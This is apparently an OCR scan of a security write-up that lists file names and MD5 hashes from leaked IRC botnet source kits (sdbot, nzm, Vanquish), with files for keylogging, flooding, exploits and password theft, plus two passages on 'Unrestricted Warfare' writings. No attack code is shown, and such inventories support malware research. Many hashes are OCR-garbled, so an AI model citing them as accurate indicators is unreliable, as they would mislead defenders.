dafb97e57690eb9d97d84435e5771498 
aspergillus.plg 
5d0b0b8b973d45722a4927e4ee680593 
blowfish.cpp 
bbdcb7c64b06e051573522f2319fad42 
blowfish.h 
f5ee9e239f68fd28998b378903673cf6 
blowfish.h2 
59aa235b4e26c7080e8e59e50baed4fe 
botkiller.cpp 
ac40a1d449bf473ba89107fba96338b8 
botkiller.h 
3e11b3091aele70cfbd9a4a7e0bd6573 
d3des.c 
507ed773d486e9d8e913eeab5a564c22 
d3des.h 
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df98a52277db93658e7384fa84740f24 
disclamer.txt 
6e7b5e52639331074b6d595e2677d318 
downloader.cpp 
aca9ce831dd58647dbbel7cf90b789b0 
ftpsplo.cpp 
79cd3ef237633912aae904174d4bfalc 
irc.cpp 
80c4ddeca75ab8500baf724a91e2adef 
KillProc.cpp 
cd5b377e1ad03bb48c3d275a08506ddb 
kpstr.h 
68484a7f1la9da757ed6b787fd0e93130 


main.cpp 5b3c885e75f72065fdcaba20742a409c 


md5.cpp 
1f257ec36f26698151lef6bc737205d42 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01lc6ba85eeal2a 
mrtmon.dll 
b6b404cf2b8559ff3639f37dabc645c2 
ms04 007 asnl.cpp 
8f122284711fa46d97092550d982e443 
ms04 007 asnl.h 
2392f928c122224766f2a6a4b13f5b25 
ms06-40-wXP.h 
dabdf44612816d4de7dea589d3ab0ff2 
MS0640.cpp 
4dc56742d985fd699c380241cc4594f8 
mscpl.exe 
f75dd0eedf04b59b9c88265f28beb8e6 
mssql.cpp 
5ecb950dbf1c894417165e84eb8759e8 
mssql.h 
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foc57a3789b74eb99087f3d630cebaee 
navi.cpop fle84ae14ea47344393b26a102bd6905 
netapi.cpp 
081c¢235a7c04a75dd2cfb11204c4d08a 
netapi.h 2af0c29aa984073d60f2654221c77260 
NEW.README.by.SiNiSTER.txt 
b66f89ae2acb856df3c8b39124c06c52 
ntapi.cpp 
8a04f3414a27e38473dbaa25b711598e 
PalTalk.h 
e51e9bb838a5f1a252b4c5e11b989836 
patcher.cpp 
527b482c40142c4b6de31c1051feaa8s5 
patcher.h 
faf8655a07e0db09b041a742548460e9 

res.rc 

a49e4ddddecle1f97eb555b1e310e9e8 

rfb.h 

4db99089dac0925e13200a8060106644 
ridahz.log 
affdab4a8b366a485965a9fb36e00421 
riderstr.txt 
b482841e9d15078cb7227519d69cc371 
sami.cpp 6291d30711713c8c18af478c09275e61 
service.cpp 
5a177b18374e6b7c737959221707ace2 
shared.cpp 
f1a9289a292a49dc9fc5b33facc8597b 

shared.h ba6af362db9aa6b7f24881341ca5b4ba 
smtpxp.cpp 
dca962f312894e6f40f8a123543e688d 
spreader.cpp 
817bae565e3314099f6b2018c5c19ea7 

str99.h 

a29246f83d43193f3974b9a4646f2c59 
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strezanada2007.h 
b4ae5afe8359d7a425e4d7c13fcaad63 
strings.cfg 
3546c5cdfc7133a706ae6ce7982c2f74 
strings1.cfg 
083bc889e0d4f9d19935b7f466651a33 
strings123.cfg 
79efd6943d39830f3f408e0d849032e5 
strnezafafa2007.h 
4db98b38cbee41eb30f7ca4b3edaafde 
strsav.h 955ee5ca50049f5804e5c6bd4c5a8ade 
strstuffz.h 
d6424841f475b9d78babb42d463e6743 
sym.cpp 
94df49494deec5a7cf368fa109943f96 
sym.h 
a24f5c02c13d41e1d63e9d1093b512d0 
version.c 
89ff78f40094f62afb55a0ebb63c1850 
version.h 
60ea99a7a88440f1896afa7134b42a3e 
vncps.cpp 
3c460a7236f896228d9292779ea9b55c 
vncps.h 
60997934cf2411ea48c33a6b92306e13 
xor.exe 
b0214b8343cee7c3fd4abd460bbe47d1 
readme.txt 
de051ba209077c61a6309436e4e0d2a0 
Injector.cpp 
d341d17edf89511a9e22f0d989a33301 
Injector.h 
00f07109572738ee7cefldb17ee0aded 
license.txt 
606bb765e265075318ddcc0bb831bf05 
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ReadMe.en 
7d261cea0fb667f0170aa02b8aa02fde 
Utils.cpp 
6191d07d925de3637eeece38fa85646e 
Utils.h 
91leeeabe5ec73dc732260d178f4b526f 
Vanquish.dsw 
4d5d04ab10e450abae7c21ac2f9bc826 
Vanquish.ncb 
9f47a4df2a070d5f738b242ef03b5645 
Vanquish.opt 
e395d61falc7bfb774d8118f6f7 9ff78 
Autoloader.aps 
8def5881ae940c87b7fedf2bf7959520 
Autoloader.cpp 
7e657268b5eceea7eedd4463966921e6 
Autoloader.dsp 
66c8b27eeal186d44db5f091922070e25 
Autoloader.dsw 
Offfo8e43fe09c62d7140cab494d1518 
Autoloader.ncb 
1d0e515a5a90287e968624e726f8ae83 
Autoloader.opt 
7¢c4e263687496062620fb94965b0421f 
Autoloader.plg 
27a09382362649c014f7ee8c68fcc521 
Autoloader.rc 
5b6b4713726b44c5ec5a209f1e33b5a9 
resource.h 
dd420ab3a456ad09d086acb5fa21e488 
Autoloader.obj 
d65f95289b4fd19c6497c0e23fcf34c7 
Autoloader.pch 
2912ffc8a56204443395ae7a550abad9 
Autoloader.res 
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c705db6dfa8ff82b24a34981ff726332 
Injector.obj 
3cdf8f0d3f2cded968ea2fcf9a3065ab 
mrtmon.exe 
f75dd0eedf04b59b9c88265f28beb8e6 
Utils.obj 
2d1856a044041db38e7bc1fcd23d290a 
vc60.ido 2e96a25f788467886589bafdf7cc627d 
rider.cpp 
7719d1ad725b21551b743c17c6885627 
rider.dsp 
5698e28ebe21943059785e0f71c4a876 
rider.dsw 
f45599728546d18ea4afe0eff7ec3b71 
rider.ncb 
b615d6af8def400d036d3355c9180a64 
rider.opt 
621767214c3c30943cf66d05890675c7 
rider.plg 
a2e080c6002719eca9d751700ffbf7e5 
xde.c 
227890d3fdc35f1lba44c9e1a58223c0d 
mrtmon.dll 
b6b404cf2b8559ff3639f37dabc645c2 
rider.dll 
354d8c05623eb4e8f3df28d0948f5f5e 
rider.obj 
acc33417cb4fb16ad47fa78b65162466 
rider.pch 
95f99df5053b1f133ad747c4f302ba35 
vc60.idb fo784b70b29d1ffO0cf064e12e59al1e59 
Makefile ad571a21f814012ef4del17c9ecfbbbc9 
asnl1.h 
2bae81693ebf68e23f3ad3f3021889be 


asnl_mac.h 
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7e10de898ecd175a61a0dbfb12185c2a 

bio.h 

ce7243ecaa4b719218elbf752adfObed 
blowfish.h 
d49e3298bc64a6e465ed7718f564d8af 

bn.h 

b37a3ef0588ce34e0c63a5274aa44961 
buffer.h 356a812a4ffc0968b57ac95e7a63ab78 
cast.h 

96116e52361c2d0300342bfb6903a3bd 
comp.h 
0c90612a2a019eaef34bdbcc66a021b8 

conf.h 

38754a66c81b8f8b8590ed04b78d161d 

conf _api.h 
844d6a3830cb086ca59f131b1484d44b 
crypto.h 3bb8443f7f07e9234e96ec9579f090d0 
des.h 

0d6c580e72b14b714df7ae5f5318fb3f 

dh.h 

f9a01c2ca0be5ead86ea26fd6574c2b4 

dsa.h 

665bdb1458242049a166edf3acd7170b 

dso.h 

4071b80cdab58b3fceaa958cOccdce46 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
engine.h 9834177eba2e98bd0f5381e74c2d3d5f 
err.h 

e9fa3cc5d24d8f10e18490856f4da054 

evp.h 

620990a191df1ca247387f09c06f3b3c 

e _os.h 
62fbb35194165d3a5cb3d10e75aaa818 

e os2.h 


784f6a58114c353b8e6f3a7787065cf3 
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Each of these is a visionary reading by itself, but perhaps it was the need for setting a new 
milestone into such warfare thinking that prompted the public release of the [9]Unrestricted 
Warfare Symposium Proceedings Book in [10]2006 and in 2007. An excerpt from the introduc- 
tion of the 2006 edition : 


"To compensate for their weaker military forces, these actors will employ a multitude of means, 
both military and nonmilitary, to strike out during times of conflict. The first rule of unrestricted 
warfare is that there are no rules; no measure is forbidden. It involves multidimensional, asym- 
metric attacks on almost every aspect of the adversary’s social, economic, and political life. 
Unrestricted warfare employs surprise and deception and uses both civilian technology and 
military weapons to break the opponent’s will." 
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hmac.h 
b660alb6e6d396efcbdcf6412e93cb93 
idea.h 
fdc6d4d55fed4dbbf381e80ab275318b 
lhash.h 
5d5084cdce6d7bc60dc400f7d4faaccf 
md2.h 
4bf98d5033c334181483471c86e38267 
md4.h 
37af532a0408e1f9dd470374c52aeb87 
md5.h 
32c0cc65f2d457e9c0302b6e14233424 
mdc2.h 
2d9994df4b22705c60dd3f4bf242a7cl 
objects.h 
4187608d042df711837945991109f9fc 
obj _mac.h 
2e39e6bffb05ddbadb58aedc947f741f 
openssliconf.h 
1356dbc2305c7ba93decedla3e45alc2 
opensslv.h 
83a195ad2b394633f9d8ec69631a51lac 
pem.h 
c679bc0909305501723b0badf24c02be 
pem2.h 
2aee9bcf129f9962f3afaed608385850 


pkcs12.h 779cf7c87331535dfd5bf69a97b2fb3d 


pkcs7.h 
0d668a62e9c4a7c6a6d9eb61f6e5c685 
rand.h 
27d59b95a7eba54a99fd862039f4dff0 
rc2.h 
0d488e28bb20ff3788fe8c52133d1cfb 
rc4.h 
1c5b8415fc3cecfcc6a5359eccbd5dbd 
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rc5.h 

94932666f36526419623555f90ab050a 
ripemd.h 350da6b77dcb285c59c78ce/7671d2873 
rsa.h 

fd6cc4c4072d3b43ba8c8d62cca229bc 
rsaref.h 58fd3f7f75cb5841387a529b888eff7b 
safestack.h 
a4174efaacdbdcb936dea701193bc8f3 

sha.h 

d35627cd8cef90002563554a8d891c84 

ssl.h 

73ef4c68b58632f2f2b55e750b7ee06d 

ssl2.h 
ddce87b1a7e4af3aa35ca8a665db6eb0 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 

ssl3.h 

e04e9f4f267129548c0e59fb144cd9bb 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
736e542efdfc7d21535a6ff8b3c03a45 

tls1.h 
d1c9de5aad2c0490825c2e1885a7e098 
tmdiff.h 8b6b6f8df660f682d29b153cfe760674 
txt _db.h 
730e334f531c6a0ac0ae95e252c53f64 
x509.h 
3d93e919f45a81357b4b97dfa0f84155 
x509v3.h 81671fe50ed0f46bd427efbe1387844d 
x509 _vfy.h 
a1954b5542b923971a40f046cbd4celc 
libeay32.lib 
31d145ada2de7ee054f490e958aa61d5 


libeay32D.lib 
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fc2f69ad8302664ba1780aadc8507759 
ssleay32.lib 
2d28bcdb0ec035da5c5fc716e1653d53 
ssleay32D.lib 
2ef69db57b73874ed9fa37b06be5cbc6 
crc32.c 
c2e731d846a546c70/7ffbb7e35a8df40 
crc32.h 
372bf1d98a03d788ca4f072b27825703 
ntpass.cpp 
9300c93598abd35edc6145786bed4805 
sdbot05b.cpp 
cbadcfaacfca4585c26b2176b9392998 
sdbot05b.dsp 
05c08c51008b62d078b1865a002c9431 
sdbot05b.dsw 
1lac2f28922917d1f0ae90ea17f13241 
sdbot05b.ncb 
c69c61a8021155e05581e6b5 7d2f35ef 
sdbot05b.opt 
3a7c2e9a6156eb2bad3209590c20eccO 
sdbot05b.plg 
1378781290754378b7273e70d108c725 
Synflood.cpp 
786045f21b413ac604494f4ae52al13e7 
tcpip.h 
f2d929e1278ad3f507a5d6dc59fb98e8s 
SDBOTO5B.obj 
0da338d4909683983348dba37ee2dc43 
sdbot05b.pch 
8ec4166702910d5c6267a7211b576d23 
vc60.idb 85198f360d26c27d722f42058f65158c 
buf.txt 
08957cd9ad643ac8455b0cfb33720ded 
icon.ico 76685dfa5860561a421b7acc5f5c37fb 
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resource.h 
f2f1500e77505ed3fcbe126c72ad8d29 

config.h 3c7f15d97a69b2d0b87b55299aafb514 
main.cpp 690353fbd306cOfflac9bb2f68831845 
main.h 

705f034dff9e14294c4700fbcfb12bf9 

NITE.dsp c25ddf61d759dccOdb8ccb00cbe6e27b 
NITE.dsw 398fd6bcf84d747d7783bb9a1ld28ded8 
NITE.mak ae0123f15d020ff9ffff5d13d2e8ddc6 
NITE.ncb cd6bb4cab0def73827478bal1f542de2e 
NITE.opt 91e4c080454a0aaa4375d3259ce4868a 
PSAPI.LIB 
982bf26a0cbe39c84c444db7aea4c518 

readme 

248977eba0984edf74872476a366e5c6 

explore. TMPO 
b95ab5603ec61b5b3261cf5568a3aa3c 

nzm.dsp 

b3ead6f7120a85443c4a0f291022145b 

nzm.dsw 

624ab1d6ccO5f0dbea9068eb6137feec 

nzm.ncb 

888afe4b90a9d4c113524b82509aefd6 

nzm.opt 
67¢74552520a21c385472be0bd4823bb 

nzm.plg 

c6041cdbff2583d6ee2b062075057f1c 
RCa00528 8a007cf94bca2597d008de2302f9ff53 
RCa03140 8a007cf94bca2597d008de2302f9ff53 
RCb03140 8a007cf94bca2597d008de2302f9ff53 
resource.h 
3b012e93f8f23a8e82b7f152b6fbfb45 

SkuZ.ico 2f19154623521456d4393f3caf6é388be 
SkuZ.rc 

d0a813f73e4b5094d47ee4aadafabla0 
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cfg.h 
dd65a5ded2ba4d10ca513efbdc99b61a 
aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
e€4865d3674e5402dbd98aad4e92412ef 
avirus.cpp 
d3a7e0771a691b3aa4653332e8f48773 
crc32.cpp 
eb17deaee053524f4cc29eab31d0bddd 
crypt.cpp 
a5898b8ff50ce3925f5b0d962ea6f3b3 
download.cpp 
27e3d600249fddb7c94ff86bf4fdff36 
driveinfo.cpp 
42e9e4b60b6902e4700979502f16b86a 
ehandler.cpp 
ea5fc7bdfe539b5e6501df39a4059485 
fphost.cpp 
dae10ad7177360d203ab4149bc721c9b 
ident.cpp 
2ed058e643bf25d4a29b0efc93b8265c 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
loaddlls.cpp 
a5e33dc3ca7e8b5d363aleabc40afd8c 
misc.cpp 7ec4770962e18a9d65aee4c68af454e2 
net.cpp 
51414aa8fe6f517dce740967fd217460 
netutils.cpp 
0d2b093e763597769bee0297c72d2d01 
nzm.cpp 
735cd09a390a3f501c10b700a71fd303 
peer2peer.cpp 
26652dbebf0c798b7700a5316b96c634 
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processes.cpp 
d82131dfa0fb50405fecf17a56653e4a 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
a2f56fdc8d7c69c9d9d036524760d8b7 
session.cpp 
d233bcad1bdb8c3fff3fdbafea714e89 
shellcode.cpp 
02f4a5601laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
bOdfb00f6écf3be0d7e20f349eae7745a 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
ddos.cpp 2b42f946f35020a522445ceac03f5916 
icmpflood.cpp 
c0a58537d3b37b433f9cla75dbfddabb 
pingudp.cpp 
bb40f6é6ebfdebla73acd6b4dda87bbcd 
supersyn.cpp 
a7664145a202dee4c9c6b98f8f53ee73 
synflood.cpp 
99147203945509439f917b663a3b0528 
tcpflood.cpp 
c19462abed0023521f07abf908adfOFf9 
tcpflood2.cpp 
al866488bf0b2de298b4b75cea74378f 
clsass.cpp 
b5481f45acac847d6cc4c636e71079de 
dcass.cpp 
21be53bdef645af48fob224ba99a4a89 
dcom.cpp ela6blf7dbel7ec9f0c63c5033e22e45 


Isass.cpp 
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8da03139779d188448ba5323e051ef5d 
Isassllsass.cpp 
5a0771481b9a90ac6a4bd26fcee91f3d 
mssql.cpp 
f82b32936c51b616fddal23645e31lacf 
mssqllsass.cpp 
c07cac3d7f400da3c0854a5f79806b69 
realcast.cpp 

70f3f87 ef679829e33f2ae98b63bbd9e 
sym06 _010.cpp 
c6f24fal30816c0af45e39e35459fcda 
vncrooter.cpp 
456b7f58ae95de426ddc40457b4b4ad7 


wins.cpp 42a267c014db4a1fb95240acde5a9887 


wkssvc.cpp 
2f837143d6d22fac428a8689c727436f 
capture.cpp 
6e06ebc6f2215300a87088ae182b9ced 
cdkeys.cpp 
1752a34e6d7d986bb918f83ceca23035 
dcc.cpp 
f5d3ef06222bef48e244c797a1l7c27c9 
findfile.cpp 
79f2af149eeab89a4f527bf664fb990d 
findpass.cpp 
133c8405971cf9a94613d6efa68f3a48 
httpd.cpp 
6d2969ed87ca82a39c8c45cc795b99e7 
keylogger.cpp 
603598b63bed71e4b7ef6ébba9f0203b2 
psniff.cpp 
e914f46c0330fa749e8db8d85a61058e 
redirect.cpp 
eOac9cef5ea9f61f41cc3726c3699248 


remotecmd.cpp 
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9c07c659b40eabe9f067838d80c40946 
secure.cpp 
adfa79c6426febc878498f0381c5f0fO 
socks4.cpp 
10af0b820c2e09f5c384c786calffef9 

visit.cpp 
60f03c5533af3a0d513986fb389a9e51 
advscan.cpp 
4742ef0e2ffe95e3e51259ff2336d430 
scan.cpp 9494dfd268fff82f7c6acc6d66295c96 
ftpd.cpp 328a73baa604alae869990a75ddf662e 
tftpd.cpp 
160e7f4f0642dbc60e679c11bbc07784 
commands.txt 
d55fc5fe731a59a92edeabb111f8901e 
nzm.jpg 
716d5fcb2cba5a117dc3579e6a57216e 
Thumbs.db 
9c2791a063bb8af8d633c4a67c3375df 
advscan.h 
69c94ef2c99020746c1e4f3871ef013d 
aliaslog.h 
5190cd5c6b9af768d2f12ec53a33539e 
autostart.h 
a346ce96fba3d146d6db423516453504 
avirus.h 5f7878ec5edf81f7c7374f2c530dff22 
capture.h 
c9b9a98f71e58aa5c95fa7e22def6029 
cdkeys.h eObf3b6a764f23ccf8d8b32a05985038 
clsass.h 8e€0336973a1f5842c2d57d4e615e208f 
crc32.h 
8ccb9e857c9cb41f21eb3c493a71413d 
crypt.h 
e6a525ef1160950005b397926308c750 
dcass.h 
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4b1d02dde13f7f25e6b252f9d5fe478e 
dcc.h 
59993ef594caf2cf41a2a49195c78eab 
dcom.h 
9d0c31dla4aacb69f45f9de51617e50b 
ddos.h 
755db82f748d3713e5f5c1756ad930d9 
defines.h 
527d282a470276fc23ce98b6ced5629c 
download.h 
87b2f888818aab05cf88fa4c72b94827 
driveinfo.h 
592244a945306749409db5f7e8236ebb 
ehandler.h 
7e€240b2a256fd7175288bfcb9b3f0afb 
externs.h 
961a933496d0dc6fb51d90a335df84ba 
findfile.h 
e7964ada0bal9576c35caa348a9fledO 
findpass.h 

d6fl2ac593da98e6 labf82cfb9d7b853 
fphost.h 4e18e2c0e05b3902660684c7d6f52ad8 
ftpd.h 
bee3cc2dd90b09d6002faddd7871d5e2 
ftppot.h 6f23f8b4c2b1684e2028e4f0e2ef033e 
functions.h 
1557ce234058d139a95c1d4675509e85 
globals.h 
23775cbc6968cac7f94add3646c4ad04 
httpd.h 
46539c7bcd1cb4d91f14ec426aea7459 
icmpflood.h 
d03b9e0a156caed926e0c6509be75fe2 
ident.h 
b12d04376ddba020bb614b28f643d722 
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includes.h 
34c4e287dd3e2f2c4d4ac9461243d4ab 
irc _send.h 
94345b8777c46d3f67dfc088b5206190 
keylogger.h 
998e7a3a5b99ab6f893fdd49ea336ffO 
loaddlls.h 
33a51d5702427f1035eef60ccbca289f 
Isass.h 
da704f3106e215af2e1b40eb/7ffle9ef 
Isassllsass.h 
96c25be3a04398fb09a76ffd7c21c03b 
misc.h 
8e2b1dfl0fb00d1b0ac04d0b3f2f4943 
mssql.h 
dad3ee87222e56569de606559cb6e64de 
mssaqllsass.h 
b8e8568851fbe532291b46211cdd930e 
net.h 
e7d2cbe50a915c90c44fbb05c12ddeec 
netutils.h 
045df2759c4c65dd18ee2fda4f2674d1 
nicklist.h 
e€267b6bc88d23669d999c9F795c79497 
nzm.h 
92ff8585cf0a5e6dbb6097b30002dd4c 
passwd.h 21ba8469c127a4cc3f96fa939bc5fa5e 
peer2peer.h 
98a87d72f519eb3af1le8288f76d3e44f 
pingudp.h 
5f919f9a14b8b68b9640c79d16b259d6 
processes.h 
95283f0340970a60121daa28ce4e5c86 
psniff.h a83f21a522599efa0206cObf5eceebd9 
random.h bfc43fc76fb94a2bee83e6782a3albad 
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Moreover, [11]the 2007 edition is [12]covering in-depth such popular asymmetric threats 
posed by jihadists (pages 135/143) debunking the use of WMD as a priority, and the cyber 
dimension (pages 251/297) with some remarkable analogies post Cold-War strategies applied 
to modern digital threats : 


"Technology alone is never going to solve the IA problem. We have no informed national de- 
fensive strategy in this area. The situation is starting to change and improve, in large part 
because visionaries like General Cartwright are in key slots. But we do not have a lot of time. 
The intelligence community is not sufficiently engaged in conducting, analyzing, and report- 
ing those issues. During the Cold War, we analyzed Soviet capabilities exhaustively. We did 
everything possible to understand our adversary and manage that gap. We need to do the 
same thing today. The bottom line is that it is dangerous to underestimate the capabilities 
of our adversaries. They do whatever it takes to win. Good adversaries know our strengths 
and weaknesses. They develop surprising partners that sometimes do not even know they are 
partners—they will give someone an honorarium to talk at a conference and ask that person 
for information on associates. They play by a different set of rules. They see offense as a 
systems problem, while our defense is fragmented." 
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realcast.h 
d7al14d60ffeab5efllde39ba64cce2e4 
redirect.h 
91eb59e1991fd1251e389b9942f1a381 
remotecmd.h 
7f6d9972b1e54786539c1df72205be44 
rndnick.h 
96313d83a017a0e87b9dc6664540a3ad 
scan.h 
4d5a41fa21277d1948c4c508c16487el1 
secure.h 8ca61057edab3e221f0981a85e31bebd 
session.h 
2e24eb8c867c37c2e4a083f41179a668 
shares.h d3a002008bd6e81af770acceb9534e42 
shellcode.h 
4ee1152c4ded683eb147c642dd3a044a 
socks4.h 25d729e47f7d550a16c46813c3c35f11 
supersyn.h 
c16fd14001ae1688a2578dca555151f0 
sym06 _010.h 
8092927570fd990f1c0063dc87d9d942 
synflood.h 
268bb714d89832a5948873dfdba0655f 
sysinfo.h 
396a06be63c7eb62b1c04fb9fffd0667 
tcpflood.h 
€11f092429b504a9dc56af5e05318d6b 
tcpflood2.h 
00271f68380e76fd220992702fc0a48e 
tcpip.h 
bf069e59cc4841e231a2ac1815c86044 
tftpd.h 
08a46fc3eleea39ac39cfab482287039 
threads.h 
5c1a437b21e61leecb8e786137456009c 
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visit.h 
b15ed3d6348b577ce5df3bad37721aff 
vncrooter.h 
b1b3696a947bdfc64a498247f1d0ce32 
wildcard.h 
c141f0f78a8e100094737a65a86f8c6b 
wins.h 
6def08395cad95ac3716b2ed5b2dac61 
wkssvc.h 0924ac6712d68a279b367a198eb25a4a 
advscan.obj 
cd030dd2d2d7630523a44b0831ee7590 
aliaslog.obj 
cf3d13da632a0ccecadfcdcd271f616f 
autostart.obj 
987157ac831590bd36e2ac95f6b755c6 
capture.obj 
169ea2abd4fa1408648f656e74b57767 
cdkeys.obj 
8f3f999acaf8lece7e2e9a76b26b8abb 
clsass.obj 
832c814b14c38b100c6ed7db19a205e5 
crc32.0bj 
acbf7clc7dfcdf0bcc7c847dfd93ad17 
crypt.obj 
€087b7487d7d3365e7833985234cd1df 
dcass.obj 
f7d700e704d86a8e9e4966f9e14deeb2 
dcc.obj 
€6377290029435cd8170b20da5a8fb75 
dcom.obj 7d4505d42f3262b6b48eb69811edb7e8 
ddos.obj 264a8dd7fe2d3f3f9e595a65340fa78d 
download.obj 
f8589d2e65bd3f7e370ac8eeafcdbeed 
driveinfo.obj 
d673648c26a2184da7af048885fe6e52 
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ehandler.obj 
57173f161e44539002692a90892cba4e 
findfile.obj 
a529f04533ced71c24056eb628b3b04b 
findpass.obj 
35cea362d313781106f075ab1e606ac8 
fphost.obj 
db2364c9b3c1415615651c31e9403c29 


ftpd.obj 5797b2246abb774459bdbfdc5c98e32d 


httpd.obj 
881b0b34ad71de4468a7f32ee9c1675a 
icmpflood.obj 
7e78ad2844239f1626c1d7d7708282a1 
ident.obj 
91d48e4c4f444af482727da36325e07a 
irc send.obj 
bac6fad1805e/7fdf6df75b0d232c8de9 
keylogger.obj 
500ae09fd50f29fe543fcfld716c2617 
loaddlls.obj 
01de7d3c8856da69d7dc72477ab9c47f 
Isass.obj 
becfb05740b03c2606fbb9c960f18ce9 
Isass1lsass.obj 
3d36697075f5f38370ac3d8af62632fb 


misc.obj a8624df6ee4368e7a938330bb83c3840 


mssql.obj 
c7fad8d90fe951d4f82bf89b62fca697 
mssqllsass.obj 
86976496e1d535091f5fec5695ab5686 
net.obj 
fdec6bbb1fd957f3dcb8b88faea6851b 
netutils.obj 
47150dd7c2618e81dfd0a92b7c3f6db5 


nzm.obj 
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55fa85f639c4066b1b011b8536cdea4e 
nzm.pch 
c92ff13816450526e4b5ea788a042860 
pingudp.obj 
0da043896b740eb8cdfee628c22e3ef2 
processes.obj 
7750fcfaac8b5409164238b8f038bbd0 
psniff.obj 
9ef907694ba665c9c4a673d61a2843ed 
random.obj 
5d2cb5b0641817798cab554440334ebf 
realcast.obj 
b4c6d0dfd18ec96678583bebb97f5002 
redirect.obj 
2c1e84bbc47223a3038b14ef8f36d2d5 
remotecmd.obj 
1e8a3689b63e9210ab18b31a8749ce14 
rndnick.obj 
9c3495c7136a0fc1b440f5e0010b6780 
scan.obj 4fe5842b2f5aa48866e11a00ad12994b 
secure.obj 
0659bef9e45db3097ec4585de2a8be02 
session.obj 
28cf62265122a24d6c81c0d624c66e6a 
shellcode.obj 
eb4133c65822196e73a5ed98bb11d093 
SkuZ.res dc10e00de12d839c5272a6f058dce578 
socks4.obj 
e323cbf5e08c60b4dee9b079e8f5ef6d 
supersyn.obj 
c1310eacbf4c88fd3794b365c41d1521 
sym06 _010.obj 
6578aea670382863e67eba0aeac4602b 
synflood.obj 
e5503d4fc7684fd3125e2a1f8a327045 
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sysinfo.obj 
a859e789065c6bf0f5c76f0f98670729 
tcpflood.obj 
80e272105bc31d9983e3439cbf712346 
tftpd.obj 
515017b6a3180826390af365f50d4702 
threads.obj 
61e6d73738ae32b2cef9a2209df95719 
vc60.idb 96030f6542c59773b66916190ff54b33 
visit.obj 
784c8e09480c4a475c1241c2562b96e9 
vncrooter.ob} 
af13f54al18e6f33f4fb93ca8e5055520 
wildcard.obj 
a0af65f9b26db7b3c9fcc10ebd5f54ac 
wkssvc.obj 
9e80cebb3cd976leae3f4fo2fac762db 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01lc6ba85eeal2a 
nzm.dsp 
0ab8199ca9cdd0bb21624aeecbealccd 
nzm.dsw 
624ab1d6ccO5f0dbea9068eb6137feec 
nzmDmod _lite.txt 
625d8aefe067bb0add21103e8231df20 
cfg.h 
87¢€8651952b7fd73234d5ffd98982595 
md5.cpp 
02a0191ee586a05f4f75e0bfb5da056c 
patcher.cpp 
b2c51cc70ce4b091e6a526660b95ce9a 
version.c 
18644cf71c681c6ebf58a032e4f43d43 
vncps.cpp 
daa860ef1540d9139e6489ce35eac144 
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aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
€4865d3674e5402dbd98aad4e9241 2ef 
download.cpp 
320038ab4f56799cd798802d0b9c05d5 
ehandler.cpp 
ea5fc7bdfe539b5e6501df39a4059485 
fphost.cpp 
dae10ad7177360d203ab4149bc721c9b 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
loaddlls.cpp 
7b62b41f9a7b7ed568e3fe926a86aa831 
misc.cpp 7e€174475d7f6f3b8321b2f8512b1b7bd 
netutils.cpp 
b070b0cc4d75dc18157d2a15f3df1c07 
nzm.cpp 
90afa7ec13b2f2263d5cafa5d13c537b 
processes.cpp 
bff3cf97ce343a46a7fdefaec07307d1 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
60397e3f6736531902dae3d300956e59 
shellcode.cpp 
02f4a5601laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
labdb86fe7af006b36a277219bfd2cf7 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
advscan.cpp 
3cda4d6bb58bcef581042c1868e3Ffc07 
12258 


dcom.cpp 1305186f504e1f2f05613882d4140b90 
ftpd.cpp 2dfe9875c3875d9d7c02e266597f4c71 
ms04 007 _asnl.cpp 
8839b06971e795dfb18d67adbedefbcl 
netapi.cpp 
d1810cbecef1c992521f5d310be4e688 
tftpd.cpp 
12481b75da46cf83fc9988731c2fe40a 
advscan.h 
045ca5b21e5bela2a8bc4d77c005e2c5 
aliaslog.h 
5190cd5c6b9af768d2f12ec53a33539e 
autostart.h 
a346ce96fba3d146d6db423516453504 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
defines.h 
9f4c0d9e7adb37186470a2ec51f4657b 
download.h 
ldaa8c9caf69cObff44ab0f9cda8fd01 
ehandler.h 
7e240b2a256fd7175288bfcb9b3f0afb 
externs.h 
a8f8df55c0e321b9f9ad73324411895b 
fphost.h 4e18e2c0e05b3902660684c7d6f52ad8 
ftpd.h 
48a891506c957340b207b627105d7bb4 
ftppot.h 6f23f8b4c2b1684e2028e4f0e2ef033e 
functions.h 
1557ce234058d139a95c1d4675509e85 
globals.h 
23775cbc6968cac7f94add3646c4ad04 
includes.h 
le7d8feb2f00ab7b75c56de2b65ec077 


irc send.h 
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94345b8777c46d3f67dfc088b5206190 
loaddlls.h 
33a51d5702427f1035eef60ccbca289f 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
misc.h 
8e2b1dfl0fb00d1b0ac04d0b3f2f4943 
ms04 007 _asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netutils.h 
aadd73f9e661c0afbe957580367eaf80 
nzm.h 
92ff8585cf0a5e6dbb6097b30002dd4c 
patcher.h 
Ofd7e323fb6808ed9a71d281ec9e8696 
processes.h 
4ed54d11e6c3641200144a36c84ce9c5 
random.h bfc43fc76fb94a2bee83e6782a3albad 
rfb.h 
c6975ff98f701dbd755b61f57299fe31 
rndnick.h 
2ce7bab502f16464b736a459732e5a67 
shellcode.h 
4ee1152c4ded683eb147c642dd3a044a 
sysinfo.h 
396a06be63c7eb62b1c04fb9Fffd0667 
tftpd.h 

6687 7fd9c1cdd45239c7ea5889dbea78 
threads.h 
